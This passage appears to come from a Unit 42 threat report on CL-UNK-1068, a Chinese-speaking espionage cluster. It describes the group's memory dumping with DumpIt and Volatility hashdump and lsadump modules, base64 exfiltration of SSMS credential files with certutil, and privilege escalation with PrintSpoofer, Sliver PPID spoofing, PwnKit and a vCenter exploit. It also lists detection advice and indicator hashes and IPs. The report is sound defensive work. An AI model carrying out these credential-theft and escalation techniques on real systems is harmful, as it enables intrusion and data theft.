ability to record a user’s logon password. The attackers behind CL-UNK-1068 attempted to use DumpIt, a free multiplatform forensics tool, in combination with the widely known Volatility framework to extract password hashes from memory. As shown in Figure 10, they used DumpIt to dump the victim machine's memory. Next, they used several Volatility modules: windows.hashdump: Extracts local user account NTLM password hashes from the SAM registry hive windows.registry.lsadump.Lsadump: Dumps LSA Secrets such as service account passwords, cached domain credentials windows.registry.cachedump.Cachedump: Dumps cached domain credentials In addition, in some instances the attackers executed DumpIt and Volatility, using batch scripts named dmp.bat and vo.bat. The sqlstudio.bin file stores saved connection info for Microsoft SQL Server Management Studio (SSMS). Attackers attempted to extract data from this file using a tool named SQL Server Management Studio Password Export Tool, deployed as ssms.exe. This tool was published on a Chinese security blog in 2015. The attackers ran the tool locally and attempted to exfiltrate the sqlstudio.bin file. They used the certutil -encode command to Base64-encode the file, and the type command to read the encoded file. Figure 11 shows this sequence of events. We assess with high confidence that CL-UNK-1068 represents activity from a threat group that communicates in Chinese. The group behind this activity cluster has been targeting high-value sectors across South, Southeast and East Asia since at least 2020. Using primarily open-source tools, community-shared malware and batch scripts, the group has successfully maintained stealthy operations while infiltrating critical organizations. This cluster of activity demonstrates versatility by operating across both Windows and Linux environments, using different versions of their tool set for each operating system. While the focus on credential theft and sensitive data exfiltration from critical infrastructure and government sectors strongly suggests an espionage motive, we cannot yet fully rule out cybercriminal intentions. We advise defenders to move beyond static indicators and focus on behavioral anomalies. Detection logic should be tuned to identify any hallmark techniques. In the case of CL-UNK-1068 activity, signs to detect include: Misuse of legitimate Python binaries for side-loading Deployment of unauthorized tunneling tools like FRP Execution of custom reconnaissance batch scripts Palo Alto Networks customers are better protected from the threats discussed above through the following products and services: Cortex Xpanse has the ability to identify exposed VMWare vCenter Server devices on the public internet and escalate these findings to defenders. Customers can enable alerting on this risk by ensuring that they’ve enabled the VMware vCenter Attack Surface Rule. Identified findings can be viewed in the incident view of Expander. These findings are also available for Cortex XSIAM customers who have purchased the ASM module. The Forensics feature of Cortex XDR enables analysts to perform forensic analysis by collecting all necessary artifacts and displaying them in an intuitive forensics console. This feature also enables in-depth analysis of specific endpoints, to fully understand the activities that occurred. Supported forensic artifacts include environment variables, command history, session history, network connections and file listing. Figure 12 shows the command history of a CL-UNK-1068 interactive attack on a Linux server. The new Cortex XDR Analytics Engine enhances behavioral detection for Linux through two key mechanisms: Uncommon Linux process communication to a rare external host: This detector flags command-and-control (C2) initiation. Tailored for Linux, it identifies low-prevalence or recurring outbound patterns that are used by advanced threats to maintain network connections. Uncommon attempt to discover a sensitive file: This detector identifies credential theft attempts, such as unauthorized access to /etc/hosts and /etc/ssl/private/.*. This exposes misused utilities and threat actor activity targeting user secrets. Figure 13 displays an “Uncommon attempt” alert that CL-UNK-1068 activity triggered. Other Palo Alto Networks products and services that can help include: Advanced URL Filtering and Advanced DNS Security identify known domains and URLs associated with this activity as malicious. Next-Generation Firewall with the Advanced Threat Prevention security subscription can help block the attacks with best practices via the following Threat Prevention signature/s 94655, 91671, 91662, 86680, 81881, 81819, 81815, 81816, 81817, 81803 The Advanced WildFire machine-learning models and analysis techniques have been reviewed and updated in light of the indicators shared in this research. Cortex XSIAM incorporates all Cortex XDR features, as well as additional protections. If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call: North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42) UK: +44.20.3743.3660 Europe and Middle East: +31.20.299.3130 Asia: +65.6983.8730 Japan: +81.50.1790.0200 Australia: +61.2.4062.7950 India: 000 800 050 45107 Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance. SHA256 hashes for shellcode loader (m.exe/l.exe) 524734501be19e9ed1bfab304b0622a2263a4f9e3db0971f3fae93f7e7369c20 SHA256 hashes for Mimikatz shellcode binary (m.bin) 26483f0886078cc9f5f9912d3ffce1301e297b435920ab1c86c9107bbdce4db2 99bd09e1c500866b2b809fd9170f1b8b7e120da21a1f2eed6165fcf81bf519b7 SHA256 hashes for LsaRecorder (ls.exe) 8a3345f0d8f1a7d78ea485ae11358cf2ae3d51cb7975524d6d67ba05a08a37ea SHA256 hashes for shellcode loader DLL (python20.dll) 6ddbfd3a96834087501f0c9415a925cafdb92cb8ff34685f138833b4795416d6 3b2b6a3ee023dfa168f257b292a28f5fbdbacb5aa2250e1efb36e650529db1b5 cfdcbc553bc7464aedfb6758b0a38acc78d9537eabe9717e60ab0d8d3b355225 SHA256 hashes for web shells d8378cf105146217e6ded438187c4ea0edcadb6cf27f5eeddda3fd80cce76d72 5c986203242e2ed25458b0606ee7be57070f6d66b7472b453d92b1b6786443bd cfcbb3014ecc560ba36103213b36fc62d6b0ef22c49067ff0d860fd7253a7c94 fb9400d763a009b3bd2b9468410e0c69ee8a4f58400e532f086cef749422210d SHA256 hashes for SQL Server Management Studio Password Export Tool (ssms.exe) c880936ba0ca153719c2cca33c1925a9480d28abc88cf4daa02f34cc8cc1c9e5 SHA256 hashes for ScanPortPlus: Windows version (sp.exe) d6ed94589b0e6a7c3e1a6052e18f3962ca78c385c78036972d5ea72c07a5772c 3e698c85660e2c012b3db7f47ca3f2b1af2b6b0e0a0d2bdb7903f91cf9d31732 0d03934eb181c2befbc5341208c4eb8f939e00382ac632216397b8210225c937 SHA256 hashes for ScanPortPlus: Linux version (sp/spp) 8d3907d56b1dd1609053cb55dd66f33499e1ea091133df76d8fe6f08f25f37b2 SHA256 hashes for FRP: Windows version (32.exe) 082a55731f972cd15e103104229a68175a8c59a52bae05daa8ed4302df7c2dec SHA256 hashes for FRP: Linux version (nginx/httpd) e1ff808321ce952384b7fff720584c48ec0fd36480d6bc9ac0d5db036102c368 cdb90179188a142d24147edcb72be8b574fac4f6833fff15a6ee803754dec0c0 f6ac9e5e76bc9daf4772c5be43c9eac1d2611caafd49fac70bbb8eebfa4781ac SHA256 hashes for CVE-2023-34048 Python Executable (vc.exe) 96f52e4666aa8df67f8d7d00a523cd25e11402108157156775603b3d9514925c e9541e8afa502e13c18734756270b10e3c07f1071283387e63c8f8b0ba591343 SHA256 hashes for srunas.exe (srunas.exe) f7c73b1ac9aff545b184ec7121f2bc706c5064dc3c17f59e9a39469031bf2ef6 SHA256 hashes for Xnote (80/iptable6) b87cee18720c176c1972cf5c74e3c09877177e0c49c34a04b910bb3c70839b71 f710dc61c2edc85841fd733a17b7977dfb889d6476c59bb3c54a5b2fd393ac13 SHA256 hashes for SuperDump (super.exe/superdump.exe) edc0287da3c6bb62a7b2fd3949be5688628fc0e893b5822bd5734a63c39f7ab1 0c7db12ec29f333bf5f53dc5c73ec446b2265fca3aad5144c3569409e15123cb SHA256 hashes for PwnKit (PwnKit.so) 8af434c2af2d901694cb27ec8639e7054f84938110a5cc4492c1bac597026d50 SHA256 hashes for PrintProgram ce20c033dcadf17d9cca325869f946efdd82ab0756fa56e262b6f573252d457c SHA256 hashes for Sliver (agent.exe) 52c817465a56ccd0fb4e914a3274a9e9a93e872583e6239bc6461e4f3e40c567 IP addresses 13.250.108[.]65 43.255.189[.]67 52.77.253[.]4 79.141.169[.]123 107.148.33[.]60 107.148.51[.]251 107.148.130[.]22 AntSwordProject, GitHub Universal Command-Line Interface for SQL Databases (usql), GitHub Fast Reverse Proxy , GitHub PrintSpoofer, GitHub Xnote Analysis, Dr.WEB Exposing Earth Berberoka, Trend Micro What are the differences and connections between CC attacks and DDoS attacks? Tencent Cloud NTP amplification DDoS attack, Cloudflare SYN flood DDoS attack, Cloudflare UDP flood DDoS attack, Cloudflare LSA_AP_LOGON_USER_EX2 Callback Function, Microsoft Learn LsaApLogonUserEx2, Kanxue Security Forum SQL Server Management Studio Password Export Tool, Alpaca House (zcgonvh) Our attribution is based on the victimology, tool set provenance and linguistic indicators found within the malware strings. In accordance with Unit 42’s attribution framework, we assess with high confidence that a threat actor communicating in Chinese is behind the CL-UNK-1068 activity that we observed. The group’s toolkit includes open-source tools and utilities shared within the Chinese security and hacking communities, including: Web shells: Authors developed both GodZilla and AntSword using a combination of English and Simplified Chinese. These web shells are derivatives of the China Chopper web shell. Community-sourced utilities: Tools such as the SQL Server Management Studio Password Export Tool and LsaRecorder were traced back to posts on Chinese security forums and blogs dating back to 2015 and 2019 respectively. Analysis of the FRP tool configuration revealed the unique authentication token frpforzhangwei. Zhang Wei is a common Chinese name. Xnote is a Linux backdoor originally discovered in 2015. According to publicly available documentation, this backdoor has only been used by Chinese threat actors since its discovery. The targeting of critical industries across South, Southeast and East Asia is consistent with common goals of China-aligned threat actors. We assess with moderate-to-high confidence that CL-UNK-1068’s primary objective is cyberespionage. This assessment stems from the actor’s post-compromise behavior — specifically, their targeted exfiltration of SQL database content and backups. The consistent targeting of critical infrastructure and government entities across South, Southeast and East Asia aligns with the interests typically associated with nation-state actors. While the victimology aligns with state interests, attackers could alternatively have monetized exfiltrated data through extortion or sold on underground markets. As such, it is possible that the threat actor behind CL-UNK-1068 is an independent cybercriminal group or a dual-use actor. The following tools and utilities have been part of CL-UNK-1068 activity across multiple campaigns since 2020. Table 2 lists the commands executed by the a.bat, hp.bat and hpp.bat host reconnaissance batch scripts, the result filenames and the purpose of each command. Table 2. Commands executed by the host reconnaissance batch scripts, the results filenames and the purpose of each command. The attackers behind CL-UNK-1068 frequently used batch scripts to perform various functions. Table 3 details some of tde scripts used. Table 3. Additional batch scripts used in CL-UNK-1068 activity. This section details the tools and utilities observed in CL-UNK-1068 activity, outlining how the attackers used these components to bypass security measures and escalate privileges. CL-UNK-1068 attackers used the open-source PrintSpoofer tool to elevate privileges. They also used a custom .NET version named PrintProgram to write a web shell with elevated privileges, as Figure 14 shows. In some intrusions, the attackers used srunas.exe to elevate privileges. This custom tool executes processes with higher privileges by copying the access token from another process, as Figure 15 shows. The attackers attempted to use a Sliver shell implant to elevate privileges. Sliver is an open-source framework that defenders can use to simulate adversarial activities. The attackers used a Sliver implant that acts as a privilege escalation shell. It attempts to find spoolsv.exe or lsass.exe and uses parent process ID spoofing to spawn cmd.exe as a child of those system processes, either with or without additional command-line arguments. Figure 16 shows a snippet of Sliver code for parent process ID spoofing. Attackers deployed PwnKit, a self-contained exploit (CVE-2021-4034) to achieve local privilege escalation on Linux systems. The attackers attempted to use a Nuitka-compiled Python executable, probably to make analysis of this tool more difficult, as Nuitka cannot be fully decompiled to Python code. This appears to be exploitation of CVE-2023-34048, a vulnerability in VMware vCenter Server that allows for remote code execution. Figure 17 shows that the tool receives two arguments: a target address and a command to execute.
unit42.paloaltonetworks.comMar 6, 2026extracted
Loading 29 more…